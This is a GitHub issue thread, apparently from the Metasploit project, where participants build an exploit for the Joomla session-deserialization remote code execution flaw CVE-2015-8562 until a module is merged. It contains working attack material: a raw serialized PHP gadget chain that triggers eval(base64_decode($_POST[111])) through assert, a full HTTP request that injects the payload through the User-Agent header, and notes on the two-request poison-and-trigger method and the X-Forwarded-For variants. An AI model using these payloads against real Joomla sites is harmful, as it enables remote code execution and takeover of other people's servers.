[Request] Critical 0day RCE in Joomla (CVE-2015-8562)

[madmike33]

@jvoisin r u interested mate

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

[wvu]

Thank you, @madmike33. Looks much better, lol.

[madmike33]

Agree 😁

[madmike33]

@wvu-r7 how about some labels

[firefart]

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

[firefart]

This seems to be the payload:

https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L83
__destruct calls disconnect which calls call_user_func_array: https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L206

[wvu]

@brandonprry ^

[madmike33]

@firefart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

[firefart]

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

[brandonprry]

I am very close, give me an hour or so.

[madmike33]

@brandonprry waiting to be the firsr one to test it :)

[firefart]

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

[brandonprry]

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

[brandonprry]

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

[kendyhikaru]

@brandonprry wait your info.

[brandonprry]

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

[brandonprry]

They are not related.

EDIT: I might have spoken too soon.

[firefart]

@brandonprry so exactly how far I got :(

[wvu]

I poked at this on my own... and got equally as far, lol.

[wvu]

Think I got it.

[firefart]

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

[wvu]

Gonna put together a PoC... hope it's not a fluke!

[firefart]

@wvu-r7 👯 so send it over for testing :D

[wvu]

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

[madmike33]

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

[wvu]

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

[icehteam]

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

[madmike33]

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

[cyadron]

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

[shargon]

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

[madmike33]

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

[firefart]

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

[icehteam]

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

[shargon]

http://www.freebuf.com/vuls/89754.html <- Solved

[madmike33]

👍 @shargon

[cyadron]

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

[borismattijssen]

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

[jstnkndy]

@borismattijssen What's the purpose of posting a screenshot but no technical details?

[borismattijssen]

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

[firefart]

lol

[jstnkndy]

so the screenshot is just.... bragging?

[borismattijssen]

just showing it isn't that hard..

[falconz]

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

[HackerOnTwoWheels]

@falconz my guess, it is not a private address lol

[firefart]

closing this because the details are public available and a module is also ready

[wchen-r7]

@firefart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

[wvu]

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

[s1m096]

Does not work with me...

[ggg4566]

Does not work to version below 3.x , need find other trick

[bgeesaman]

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

[JohnMartinelli]

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.

—
Reply to this email directly or view it on GitHub
#6347 (comment).

[icehteam]

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

[adrian-rt]

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

[VivekShingala]

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?